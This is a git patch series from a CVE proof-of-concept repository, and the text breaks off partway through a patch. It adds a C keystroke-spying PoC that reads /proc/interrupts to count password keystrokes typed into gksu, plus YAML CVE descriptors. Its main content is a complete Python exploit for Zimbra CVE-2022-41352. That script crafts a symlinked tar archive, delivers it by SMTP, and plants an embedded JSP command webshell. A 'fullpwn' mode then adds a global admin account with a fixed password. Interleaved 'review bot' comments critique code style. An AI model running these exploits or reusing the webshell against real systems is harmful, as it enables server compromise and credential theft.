17 00:00:00 2001 
From: KunWang Date: Tue, 11 Apr 2023 03:54:09 +0000 Subject: [PATCH 079/109] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20?= =?UTF-8?q?cve/linux-kernel/2011/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2011/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/linux-kernel/2011/.keep diff --git a/cve/linux-kernel/2011/.keep b/cve/linux-kernel/2011/.keep deleted file mode 100644 index e69de29b..00000000 From 70511cebd501e2a981159f2b47eb38a0fdb8be39 Mon Sep 17 00:00:00 2001 From: KunWang Date: Tue, 11 Apr 2023 03:56:06 +0000 Subject: [PATCH 080/109] =?UTF-8?q?=E4=BF=AE=E6=94=B9POC=20=E6=B7=BB?= =?UTF-8?q?=E5=8A=A0POC?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: KunWang --- cve/linux-kernel/2011/CVE-2011-4917/.keep | 0 .../2011/CVE-2011-4917/CVE-2011-4917.c | 178 ++++++++++++++++++ 2 files changed, 178 insertions(+) delete mode 100644 cve/linux-kernel/2011/CVE-2011-4917/.keep create mode 100644 cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917.c diff --git a/cve/linux-kernel/2011/CVE-2011-4917/.keep b/cve/linux-kernel/2011/CVE-2011-4917/.keep deleted file mode 100644 index e69de29b..00000000 diff --git a/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917.c b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917.c new file mode 100644 index 00000000..bab4fad3 --- /dev/null +++ b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917.c 
@@ -0,0 +1,178 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + + +int i8042_number; +int ints[1024], ints_prev[1024], ints_delta[1024]; + +char buffer[1024]; + +int reread_ints(int *interrupts, int int_count, char **names) +{ + int i; + int n, c1, c2; + char s1[1024], s2[1024]; + + int interrupts_fd; + FILE *interrupts_file; + + interrupts_fd = open("/proc/interrupts", O_RDONLY); + if (interrupts_fd == -1) + err(1, "open(\"/proc/interrupts\")"); + + interrupts_file = fdopen(interrupts_fd, "r"); + if (interrupts_file == NULL) + err(1, "fdopen"); + + if (fseek(interrupts_file, 0, SEEK_SET) < 0) + err(1, "lseek"); + + fgets(buffer, sizeof(buffer), interrupts_file); + + for (i = 0; i < int_count; i++) { + if (fgets(buffer, sizeof(buffer), interrupts_file) == NULL) { + fclose(interrupts_file); + return i; + } + + if (sscanf(buffer, "%d: %d %d %s %s", &n, &c1, &c2, s1, s2) < 3) { + fclose(interrupts_file); + return i; + } + + if (names != NULL && names[i] == NULL) + names[i] = strdup(s2); + + interrupts[i] = c1 + c2; + } + + fclose(interrupts_file); + return int_count; +} + +void init_i8042_number(void) +{ + int i; + int can_be_keyboard[1024]; + char *names[1024]; + int number_of_interrups, can_be_keyboard_numbers; + + number_of_interrups = reread_ints(ints_prev, sizeof(ints_prev), names); + + /* + * Identify the i8042 interrupt associated with the keyboard by: + * 1) name should be i8042 + * 2) interrupts count emitted in one second shouldn't be more than 100 + */ + for (i = 0; i < number_of_interrups; i++) + can_be_keyboard[i] = strcmp(names[i], "i8042") == 0; + + while (1) { + sleep(1); + reread_ints(ints, sizeof(ints), NULL); + + can_be_keyboard_numbers = 0; + for (i = 0; i < number_of_interrups; i++) { + can_be_keyboard[i] &= (ints[i] - ints_prev[i]) < 100; + if (can_be_keyboard[i]) + can_be_keyboard_numbers++; + + ints_prev[i] = ints[i]; + } + + if (can_be_keyboard_numbers == 1) { + for (i = 0; i < 
number_of_interrups; i++) + if (can_be_keyboard[i]) { + i8042_number = i; + printf("i8042 keyboard is #%d\n", i); + return; + } + } + } +} + +int i8042_read(void) +{ + reread_ints(ints, sizeof(ints), NULL); + ints_prev[i8042_number] = ints[i8042_number]; + + return ints[i8042_number]; +} + +int wait_for_program(char *pname) +{ + FILE *f; + int pid; + char s[1024]; + + snprintf(s, sizeof(s), "while :; do pgrep %s >/dev/null && break;" + " sleep 0.1; done", pname); + system(s); + snprintf(s, sizeof(s), "pgrep %s", pname); + f = popen(s, "r"); + if (f == NULL) + err(1, "popen"); + + if (fgets(buffer, sizeof(buffer), f) == NULL) + err(1, "fgets"); + + if (sscanf(buffer, "%d", &pid) < 1) + err(1, "sscanf"); + + pclose(f); + + return pid; +} + +int main(int argc, char *argv[]) +{ + int n, old, sum, i; + int pid; + char *pname = argv[1]; + + if (argc < 2) + errx(1, "usage: spy-interrupts gksu"); + + puts("Waiting for mouse activity..."); + init_i8042_number(); + + pid = wait_for_program(pname); + printf("%s is %d\n", pname, pid); + + old = i8042_read(); + + sum = 0; + + while (1) { + n = i8042_read(); + if (old == n) + usleep(10000); + else { + for (i = 0; i < n-old; i++) + putchar('.'); + fflush(stdout); + } + + sum += n - old; + old = n; + + if (kill(pid, 0) < 0 && errno == ESRCH) + break; + } + + /* + * #interrupts == 2 * #keystrokes. + * #keystrokes = len(password) - 1 because of ENTER after the password. + */ + printf("\n%d keystrokes\n", (sum-2)/2); + + return 0; +} \ No newline at end of file From 8935efc390c5b846d5b626a9cb73b923185a9d18 Mon Sep 17 00:00:00 2001 From: KunWang Date: Tue, 11 Apr 2023 03:56:45 +0000 Subject: [PATCH 081/109] add cve/linux-kernel/2011/CVE-2011-4917/README.md. Signed-off-by: KunWang --- cve/linux-kernel/2011/CVE-2011-4917/README.md | 14 ++++++++++++++ 1 file changed, 14 insertions(+) create mode 100644 cve/linux-kernel/2011/CVE-2011-4917/README.md 
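Review bot: `init_i8042_number` declares `char *names[1024]` without initialising it, yet `reread_ints` only assigns `names[i]` when `names[i] == NULL`, so any slot holding stack garbage is left as a dangling pointer and the later `strcmp(names[i], "i8042")` dereferences it; `char *names[1024] = {0};` closes that gap. The call `reread_ints(ints_prev, sizeof(ints_prev), names)` also passes the byte size (4096) as `int_count` while `ints_prev`, `names` and `can_be_keyboard` hold 1024 elements, so the bound only holds because `/proc/interrupts` happens to be shorter; `sizeof(ints_prev) / sizeof(ints_prev[0])` is the intended count, and the same `sizeof(ints)` pattern appears in the `while` loop and in `i8042_read`. The `#include` lines at the top of the hunk show no header names on this page, which may be an extraction artifact, but the committed file is worth checking for that.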
diff --git a/cve/linux-kernel/2011/CVE-2011-4917/README.md b/cve/linux-kernel/2011/CVE-2011-4917/README.md new file mode 100644 index 00000000..d95ca27d --- /dev/null +++ b/cve/linux-kernel/2011/CVE-2011-4917/README.md @@ -0,0 +1,14 @@ +A PoC for spying for keystrokes in gksu via /proc/interrupts in Linux <= 3.1. +In the Linux kernel through 3.1 there is an information disclosure issue via /proc/stat. + +The file /proc/interrupts is world readable. It contains information about how many interrupts were emitted since the system boot. We may loop on one CPU core while the victim is executed on another, and learn the length of victim's passord via monitoring emitted interrupts' counters of the keyboard interrupt. The PoC counts only keystrokes number, but it can be easily extended to note the delays between the keystrokes and do the statistical analysis to learn the precise input characters. + +The limitations: + - it works on 2-core CPUs only. + - it works on 1-keyboard systems only. + - it doesn't carefully count the first and last keystrokes (e.g. ENTER after the password input). + - it doesn't carefully filter keystrokes after ENTER. + +run as: gcc -Wall spy-interrupts.c -o spy-interrupts && ./spy-interrupts gksu + +P.S. The harm of 0444 /proc/interrupts is known for a long time, but I was told about this specific attack vector by Tavis Ormandy just after similar PoC spy-sched was published. \ No newline at end of file From 6200b18e0f91efbc91f42f03935b80e9f5674271 Mon Sep 17 00:00:00 2001 From: KunWang Date: Tue, 11 Apr 2023 03:57:24 +0000 Subject: [PATCH 082/109] rename cve/linux-kernel/2011/yaml/.keep to cve/linux-kernel/2011/yaml/CVE-2011-4917.yaml. Signed-off-by: KunWang --- cve/linux-kernel/2011/yaml/.keep | 0 cve/linux-kernel/2011/yaml/CVE-2011-4917.yaml | 18 ++++++++++++++++++ 2 files changed, 18 insertions(+) delete mode 100644 cve/linux-kernel/2011/yaml/.keep create mode 100644 cve/linux-kernel/2011/yaml/CVE-2011-4917.yaml 
diff --git a/cve/linux-kernel/2011/yaml/.keep b/cve/linux-kernel/2011/yaml/.keep
deleted file mode 100644
index e69de29b..00000000
diff --git a/cve/linux-kernel/2011/yaml/CVE-2011-4917.yaml b/cve/linux-kernel/2011/yaml/CVE-2011-4917.yaml
new file mode 100644
index 00000000..255ddd17
--- /dev/null
+++ b/cve/linux-kernel/2011/yaml/CVE-2011-4917.yaml
@@ -0,0 +1,18 @@
+id: CVE-2011-4917
+source: https://www.openwall.com/lists/oss-security/2011/11/07/9
+info:
+ name: Linux内核是一个自由和开源的、单片的、模块化的、多任务的、类似Unix的操作系统内核。它最初是由Linus Torvalds在1991年为他的基于i386的PC编写的,它很快就被采纳为GNU操作系统的内核,GNU被写成一个自由(liber)的Unix替代品。
+ severity: medium
+ description: 在3.1版本的Linux内核中,存在一个通过/proc/stat的信息泄露问题。
+ scope-of-influence:
+ Linux kernel <= 3.1
+ reference:
+ - https://nvd.nist.gov/vuln/detail/cve-2011-4917
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 5.5
+ cve-id: CVE-2011-4917
+ cwe-id: CWE-200
+ cnvd-id: None
+ kve-id: None
+ tags: information disclosure
\ No newline at end of file
From a6d1708bf4aa1d8881aadafcbf8ed5db5228eb5c Mon Sep 17 00:00:00 2001
From: KunWang
Date: Tue, 11 Apr 2023 03:57:59 +0000
Subject: [PATCH 083/109] update other_list.yaml.
Signed-off-by: KunWang
---
 other_list.yaml | 1 +
 1 file changed, 1 insertion(+)
diff --git a/other_list.yaml b/other_list.yaml
index ede901d9..cf82c0bd 100644
--- a/other_list.yaml
+++ b/other_list.yaml
@@ -14,6 +14,7 @@ cve:
 - CVE-2020-27194
 - CVE-2023-0179
 - CVE-2018-18955
+ - CVE-2011-4917
 polkit:
 - CVE-2021-3560
 Outlook:
From cc9e81fc13988bee0e9dc4f7ced3ed5d1eb647cf Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E9=AB=98=E6=96=B9=E8=BF=9C?=
Date: Tue, 11 Apr 2023 07:47:07 +0000
Subject: [PATCH 084/109] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2022-41352?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 cve/Zimbra/2022/CVE-2022-41352/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 cve/Zimbra/2022/CVE-2022-41352/.keep
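Review bot: The `description` of the new CVE-2011-4917.yaml names `/proc/stat` as the leaking file, while the PoC committed in this series (CVE-2011-4917.c) and its README read `/proc/interrupts`. The sentence follows the NVD wording, so it is not wrong as a quotation, but a reader jumping from this descriptor to the PoC will look for the wrong file; a second sentence in `description` stating that the accompanying PoC monitors the keyboard interrupt counter in `/proc/interrupts` would reconcile the two. The `source` URL is an oss-security post, so it may be worth confirming which of the two files that post discusses.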
diff --git a/cve/Zimbra/2022/CVE-2022-41352/.keep b/cve/Zimbra/2022/CVE-2022-41352/.keep new file mode 100644 index 00000000..e69de29b From 6c6fa02ed99098b2d8b1d911b2e6e748ce7ee777 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=AB=98=E6=96=B9=E8=BF=9C?= Date: Tue, 11 Apr 2023 07:48:42 +0000 Subject: [PATCH 085/109] add cve-2022-41352 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 高方远 --- .../2022/CVE-2022-41352/cve-2022-41352.py | 236 ++++++++++++++++++ 1 file changed, 236 insertions(+) create mode 100644 cve/Zimbra/2022/CVE-2022-41352/cve-2022-41352.py diff --git a/cve/Zimbra/2022/CVE-2022-41352/cve-2022-41352.py b/cve/Zimbra/2022/CVE-2022-41352/cve-2022-41352.py new file mode 100644 index 00000000..d440f7e6 --- /dev/null +++ b/cve/Zimbra/2022/CVE-2022-41352/cve-2022-41352.py @@ -0,0 +1,236 @@ +#!/usr/bin/env python3 + +import sys +import smtplib +import argparse +from time import sleep +from email.mime.multipart import MIMEMultipart +from email.mime.application import MIMEApplication +from email.mime.text import MIMEText +import requests +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +# CONFIGURATION +#---------------------------------- +TARGET = 'mail.test.org' +WEBSHELL_PATH = '/public/jsp' +WEBSHELL_NAME = 'Startup1_3.jsp' +ATTACHMENT = 'payload.tar' +SENDER = 'test@test.org' +RECIPIENT = 'admin@test.org' + +EMAIL_SUBJECT = 'CVE-2022-41352' +EMAIL_BODY = 'Just testing.

Don\'t mind me.

' +#---------------------------------- + +# Only change this if zimbra was not installed in the default location +UPLOAD_BASE = '/opt/zimbra/jetty_base/webapps/zimbra' + + +def create_tar_payload(payload, payload_name, payload_path, lnk='startup'): + # Block 1 + link = lnk.encode() + mode = b'0000777\x00' # link permissions + ouid = b'0001745\x00' # octal uid (997) + ogid = b'0001745\x00' # octal gid + lnsz = b'00000000000\x00' # file size (link = 0) + lmod = b'14227770134\x00' # last modified (octal unix) + csum = b' ' # checksum = 8 blanks + type = b'2' # type (link = 2) + targ = payload_path.encode() # link target + magi = b'ustar \x00' # ustar magic bytes + version + ownu = b'zimbra' # user owner + owng = b'zimbra' # group owner + vers = b'\x00'*8 + b'\x00'* 8 # device major and minor + pref = b'\x00'*155 # prefix (only used if the file name length exceeds 100) + + raw_b1_1 = link + b'\x00'*(100-len(link)) + mode + ouid + ogid + lnsz + lmod + raw_b1_2 = type + targ + b'\x00'*(100-len(targ)) + magi + ownu + b'\x00'*(32-len(ownu)) + owng + b'\x00'*(32-len(owng)) + vers + pref + # calculate and insert checksum + csum = oct(sum(b for b in raw_b1_1+csum+raw_b1_2))[2:] + raw_b1 = raw_b1_1 + f'{csum:>07}'.encode() + b'\x00' + raw_b1_2 + # pad block to 512 + raw_b1 += b'\00'*(512-len(raw_b1)) + + # Block 2 + mode = b'0000644\x00' # file permissions + file = f'{lnk}/{payload_name}'.encode() + flsz = oct(len(payload))[2:] # file size + csum = b' ' # checksum = 8 blanks + type = b'0' # type (file = 0) + targ = b'\x00'*100 # link target = none + + raw_b2_1 = file + b'\x00'*(100-len(file)) + mode + ouid + ogid + f'{flsz:>011}'.encode() + b'\x00' + lmod + raw_b2_2 = type + targ + magi + ownu + b'\x00'*(32-len(ownu)) + owng + b'\x00'*(32-len(owng)) + vers + pref + # calculate and insert checksum + csum = oct(sum(b for b in raw_b2_1+csum+raw_b2_2))[2:] + raw_b2 = raw_b2_1 + f'{csum:>07}'.encode() + b'\x00' + raw_b2_2 + # pad block to 512 + raw_b2 += b'\00'*(512-len(raw_b2)) + 
+ + # Assemble + raw_tar = raw_b1 + raw_b2 + payload + b'\x00'*(512-(len(payload)%512)) + raw_tar += b'\x00' * 512 * 2 # Trailer: end with 2 empty blocks + + return raw_tar + +# Update this if you want to use a legit email account for sending the payload +def smtp_send_file(target, sender, recipient, subject, body, attachment, attachment_name): + msg = MIMEMultipart() + msg['Subject'] = subject + msg['From'] = sender + msg['To'] = recipient + + message = MIMEText(body, 'html') + msg.attach(message) + + att = MIMEApplication(attachment) + att.add_header('Content-Disposition', 'attachment', filename=attachment_name) + msg.attach(att) + + try: + print(f'>>> Sending payload') + smtp_server = smtplib.SMTP(target,25) + smtp_server.sendmail(sender, recipient, msg.as_string()) + print(f'>>> Payload delivered') + except Exception as e: + print(f'[!] Failed to send the mail: {e}') + sys.exit(1) + +def verify_upload(target, shell, path): + print(f'>>> Verifying upload to {path}/{shell} ...') + sleep(5) # give the server time to process the email + resp = requests.get(f'https://{target}{path}/{shell}', verify=False) + if resp.status_code == 200: + print(f'>>> [PWNED] Upload successful!') + else: + print(f'>>> Upload unsuccesful :(') + sys.exit(1) + +def create_new_zimbra_admin(target, shell, path): + url = f'https://{target}' + pw = 'Pwn1ng_Z1mbra_!s_fun' + print(f'>>> Adding a new global administrator') + if (input(f'>>> Are you sure you want to continue? 
(yN): ') != 'y'): + sys.exit(0) + admin = input(f'>>> Enter the new admin email (newadmin@domain.com): ') + r = requests.get(f'{url}/{path}/{shell}?task=/opt/zimbra/bin/zmprov ca {admin} {pw}', verify=False) + r = requests.get(f'{url}/{path}/{shell}?task=/opt/zimbra/bin/zmprov ma {admin} zimbraIsAdminAccount TRUE', verify=False) + + print(f'>>> Login to {url}:7071/zimbraAdmin/ with:') + print(f'>>> Email : {admin}') + print(f'>>> Password : {pw}') + + +def main(args): + global TARGET,WEBSHELL_PATH,WEBSHELL_NAME,ATTACHMENT,SENDER,RECIPIENT,EMAIL_SUBJECT,EMAIL_BODY + + # Kali JSP WebShell + payload = b'
<%@ page import="java.io.*" %><% String cmd=request.getParameter("task");String output="";if(cmd!=null){String s=null;try {Process p=Runtime.getRuntime().exec(cmd);BufferedReader sI=new BufferedReader(new InputStreamReader(p.getInputStream()));while((s = sI.readLine())!=null){output+=s;}}catch(IOException e){e.printStackTrace();}} %>
<%=output %>
' + + # Using this instead of argparse default values to allow easy manual configuration as well + if args.payload: + try: + with open(args.payload, 'rb') as f: + payload = f.read() + except Exception as e: + print(f'Failed to read {args.payload}: {e}') + sys.exit(1) + print(f'>>> Using custom payload from: {args.payload}') + else: + print(f'>>> Using default payload: JSP Webshell') + if args.path: + WEBSHELL_PATH = args.path + if args.file: + WEBSHELL_NAME = args.file + if args.attach: + ATTACHMENT = args.attach + + tar = create_tar_payload(payload, WEBSHELL_NAME, UPLOAD_BASE+WEBSHELL_PATH) + + print(f'>>> Assembled payload attachment: {ATTACHMENT}') + print(f'>>> Payload will be extracted to ({UPLOAD_BASE}){WEBSHELL_PATH}/{WEBSHELL_NAME}') + if args.mode == 'manual': + with open(ATTACHMENT, 'wb') as f: + f.write(tar) + print(f'>>> Attachment saved locally.') + sys.exit(0) + + if args.target: + TARGET = args.target + + print(f'>>> Targeting {TARGET}') + + if args.sender: + SENDER = args.sender + if args.recip: + RECIPIENT = args.recip + if args.subject: + EMAIL_SUBJECT = args.subject + if args.body: + try: + with open(args.body, 'rb') as f: + EMAIL_BODY = f.read().decode() + except Exception as e: + print(f'Failed to read {args.body}: {e}') + sys.exit(1) + print(f'>>> Using custom email body from: {args.body}') + + + smtp_send_file( TARGET, + SENDER, + RECIPIENT, + EMAIL_SUBJECT, + EMAIL_BODY, + tar, + ATTACHMENT ) + + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + + verify_upload(TARGET, WEBSHELL_NAME, WEBSHELL_PATH) + + print(f'>>> Shell at: https://{TARGET}{WEBSHELL_PATH}/{WEBSHELL_NAME}') + if args.mode == 'auto': + sys.exit(0) + + if args.payload: + print(f'>>> (!) 
"fullpwn" depends on the default JSP webshell - won\'t create the admin account') + else: + create_new_zimbra_admin(TARGET, WEBSHELL_NAME, WEBSHELL_PATH) + + sys.exit(0) + +if __name__ == '__main__': + epi = ''' +Alternatively, edit the script to change the default configuration. + +The available modes are: + + manual : Only create the payload - you have to deploy the payload yourself. + auto : Create a webshell and deploy it via SMTP. + fullpwn : After deploying a webshell, add a new global mail administrator. +''' + + p = argparse.ArgumentParser( + description = 'CVE-2022-41352 Zimbra RCE', + formatter_class = argparse.RawDescriptionHelpFormatter, + epilog = epi + ) + p.add_argument('mode', metavar='mode', choices=['manual', 'auto', 'fullpwn'], help='(manual|auto|fullpwn) - see below') + + p.add_argument('--target', required=False, metavar='', dest='target', help=f'the target server (default: "{TARGET}")') + p.add_argument('--payload', required=False, metavar='', help='the file to save on the target (default: jsp webshell)') + p.add_argument('--path', required=False, metavar='', help=f'relative path for the file upload (default: "{WEBSHELL_PATH}")') + p.add_argument('--file', required=False, metavar='', help=f'name of the uploaded file (default: "{WEBSHELL_NAME}")') + p.add_argument('--attach', required=False, metavar='', help=f'name of the email attachment containing the payload (default: "{ATTACHMENT}")') + p.add_argument('--sender', required=False, metavar='', help=f'sender mail address (default: "{SENDER}")') + p.add_argument('--recip', required=False, metavar='', help=f'recipient mail address (default: "{RECIPIENT}") (if you can deploy the email directly to the server, neither the sender nor the recipient have to exist for the exploit to work)') + p.add_argument('--subject', required=False, metavar='', help=f'subject to use in the email (default: "{EMAIL_SUBJECT}")') + p.add_argument('--body', required=False, metavar='', help=f'file containing the html 
content for the email body (default: "{EMAIL_BODY}")') + + args = p.parse_args() + + main(args) From c61a725ce762184f8bfef88ea2491797fdf7f2da Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=AB=98=E6=96=B9=E8=BF=9C?= Date: Tue, 11 Apr 2023 07:48:56 +0000 Subject: [PATCH 086/109] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20?= =?UTF-8?q?cve/Zimbra/2022/CVE-2022-41352/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Zimbra/2022/CVE-2022-41352/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Zimbra/2022/CVE-2022-41352/.keep diff --git a/cve/Zimbra/2022/CVE-2022-41352/.keep b/cve/Zimbra/2022/CVE-2022-41352/.keep deleted file mode 100644 index e69de29b..00000000 From f355b6b67941c54595d6049c7640dce8e6d17258 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=AB=98=E6=96=B9=E8=BF=9C?= Date: Tue, 11 Apr 2023 08:04:13 +0000 Subject: [PATCH 087/109] add cve-2022-41352 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 高方远 --- cve/Zimbra/2022/yaml/CVE-2022-41352.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 cve/Zimbra/2022/yaml/CVE-2022-41352.yaml diff --git a/cve/Zimbra/2022/yaml/CVE-2022-41352.yaml b/cve/Zimbra/2022/yaml/CVE-2022-41352.yaml new file mode 100644 index 00000000..1a051231 --- /dev/null +++ b/cve/Zimbra/2022/yaml/CVE-2022-41352.yaml 
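Review bot: The SMTP session opened in smtp_send_file is never closed: `smtplib.SMTP(target,25)` is bound to a local and dropped without `quit()`, so the connection is left to the garbage collector on both the success and the failure path; `with smtplib.SMTP(target, 25) as smtp_server:` releases it deterministically. In create_tar_payload the 100-byte ustar name fields are padded with `b'\x00'*(100-len(...))`, which silently becomes an empty pad (and a malformed header) as soon as a name exceeds 100 bytes, so a length check that raises `ValueError` before the header is assembled would make that failure visible instead of producing an archive that is quietly wrong. Two smaller points of style: the local `type` shadows the builtin, and `requests.packages.urllib3.disable_warnings(InsecureRequestWarning)` is only reached after the mail has been sent, so it is not the module-level setup its name suggests. Several string literals in this hunk (EMAIL_BODY at the top, the payload literal in main, the `input` prompts and one `help=` string) appear to have lost angle-bracket text in rendering, so the text as shown would not parse and the review is of the visible source only.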
@@ -0,0 +1,24 @@ +id: CVE-2022-41352 +source: https://github.com/Cr4ckC4t/cve-2022-41352-zimbra-rce +info: + name: Zimbra提供一套开源协同办公套件包括WebMail,日历,通信录,Web文档管理和创作。 + severity: critical + description: | + An issue was discovered in Zimbra Collaboration (ZCS) 8.8.15 and 9.0. An attacker can upload arbitrary files through amavisd via a cpio loophole (extraction to /opt/zimbra/jetty/webapps/zimbra/public) that can lead to incorrect access to any other user accounts. Zimbra recommends pax over cpio. Also, pax is in the prerequisites of Zimbra on Ubuntu; however, pax is no longer part of a default Red Hat installation after RHEL 6 (or CentOS 6). Once pax is installed, amavisd automatically prefers it over cpio. + scope-of-influence: + ZCS < 8.8.15 patch 33 + ZCS < 9.0.0 patch 26 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-41352 + - https://wiki.zimbra.com/wiki/Security_Center + - https://forums.zimbra.org/viewtopic.php?t=71153&p=306532 + - https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories + - http://packetstormsecurity.com/files/169458/Zimbra-Collaboration-Suite-TAR-Path-Traversal.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-41352 + cwe-id: CWE-434 + cnvd-id: None + kve-id: None + tags: CVE-2022, 文件上传 \ No newline at end of file From f98fb3d37439906fa617454ceba4a33ea77a28a8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=AB=98=E6=96=B9=E8=BF=9C?= Date: Tue, 11 Apr 2023 08:11:53 +0000 Subject: [PATCH 088/109] update other_list.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 高方远 --- other_list.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/other_list.yaml b/other_list.yaml index cf82c0bd..b5ad0832 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -59,5 +59,7 @@ cve: - CVE-2022-30525 WordPress: - CVE-2019-8942 + Zimbra: + - CVE-2022-41352 cnvd: 
From 277b0312b7aa9be3ebf02a8eb66f20c316ab4741 Mon Sep 17 00:00:00 2001 From: gzm Date: Tue, 11 Apr 2023 11:52:28 +0000 Subject: [PATCH 089/109] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2011-4916?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2011/CVE-2011-4916/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/linux-kernel/2011/CVE-2011-4916/.keep diff --git a/cve/linux-kernel/2011/CVE-2011-4916/.keep b/cve/linux-kernel/2011/CVE-2011-4916/.keep new file mode 100644 index 00000000..e69de29b From 341f31d7307540513e647b9597f31e227466b959 Mon Sep 17 00:00:00 2001 From: gzm Date: Tue, 11 Apr 2023 11:53:08 +0000 Subject: [PATCH 090/109] =?UTF-8?q?add=20cve/linux-kernel/2011/CVE-2011-49?= =?UTF-8?q?16/CVE-2011-4916.c.=20=E6=8F=90=E4=BA=A4POC?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: gzm --- .../2011/CVE-2011-4916/CVE-2011-4916.c | 178 ++++++++++++++++++ 1 file changed, 178 insertions(+) create mode 100644 cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c diff --git a/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c b/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c new file mode 100644 index 00000000..949781c2 --- /dev/null +++ b/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c 
@@ -0,0 +1,178 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + + +int i8042_number; +int ints[1024], ints_prev[1024], ints_delta[1024]; + +char buffer[1024]; + +int reread_ints(int *interrupts, int int_count, char **names) +{ + int i; + int n, c1, c2; + char s1[1024], s2[1024]; + + int interrupts_fd; + FILE *interrupts_file; + + interrupts_fd = open("/proc/interrupts", O_RDONLY); + if (interrupts_fd == -1) + err(1, "open(\"/proc/interrupts\")"); + + interrupts_file = fdopen(interrupts_fd, "r"); + if (interrupts_file == NULL) + err(1, "fdopen"); + + if (fseek(interrupts_file, 0, SEEK_SET) < 0) + err(1, "lseek"); + + fgets(buffer, sizeof(buffer), interrupts_file); + + for (i = 0; i < int_count; i++) { + if (fgets(buffer, sizeof(buffer), interrupts_file) == NULL) { + fclose(interrupts_file); + return i; + } + + if (sscanf(buffer, "%d: %d %d %s %s", &n, &c1, &c2, s1, s2) < 3) { + fclose(interrupts_file); + return i; + } + + if (names != NULL && names[i] == NULL) + names[i] = strdup(s2); + + interrupts[i] = c1 + c2; + } + + fclose(interrupts_file); + return int_count; +} + +void init_i8042_number(void) +{ + int i; + int can_be_keyboard[1024]; + char *names[1024]; + int number_of_interrups, can_be_keyboard_numbers; + + number_of_interrups = reread_ints(ints_prev, sizeof(ints_prev), names); + + /* + * Identify the i8042 interrupt associated with the keyboard by: + * 1) name should be i8042 + * 2) interrupts count emitted in one second shouldn't be more than 100 + */ + for (i = 0; i < number_of_interrups; i++) + can_be_keyboard[i] = strcmp(names[i], "i8042") == 0; + + while (1) { + sleep(1); + reread_ints(ints, sizeof(ints), NULL); + + can_be_keyboard_numbers = 0; + for (i = 0; i < number_of_interrups; i++) { + can_be_keyboard[i] &= (ints[i] - ints_prev[i]) < 100; + if (can_be_keyboard[i]) + can_be_keyboard_numbers++; + + ints_prev[i] = ints[i]; + } + + if (can_be_keyboard_numbers == 1) { + for (i = 0; i < 
number_of_interrups; i++) + if (can_be_keyboard[i]) { + i8042_number = i; + printf("i8042 keyboard is #%d\n", i); + return; + } + } + } +} + +int i8042_read(void) +{ + reread_ints(ints, sizeof(ints), NULL); + ints_prev[i8042_number] = ints[i8042_number]; + + return ints[i8042_number]; +} + +int wait_for_program(char *pname) +{ + FILE *f; + int pid; + char s[1024]; + + snprintf(s, sizeof(s), "while :; do pgrep %s >/dev/null && break;" + " sleep 0.1; done", pname); + system(s); + snprintf(s, sizeof(s), "pgrep %s", pname); + f = popen(s, "r"); + if (f == NULL) + err(1, "popen"); + + if (fgets(buffer, sizeof(buffer), f) == NULL) + err(1, "fgets"); + + if (sscanf(buffer, "%d", &pid) < 1) + err(1, "sscanf"); + + pclose(f); + + return pid; +} + +int main(int argc, char *argv[]) +{ + int n, old, sum, i; + int pid; + char *pname = argv[1]; + + if (argc < 2) + errx(1, "usage: spy-interrupts gksu"); + + puts("Waiting for mouse activity..."); + init_i8042_number(); + + pid = wait_for_program(pname); + printf("%s is %d\n", pname, pid); + + old = i8042_read(); + + sum = 0; + + while (1) { + n = i8042_read(); + 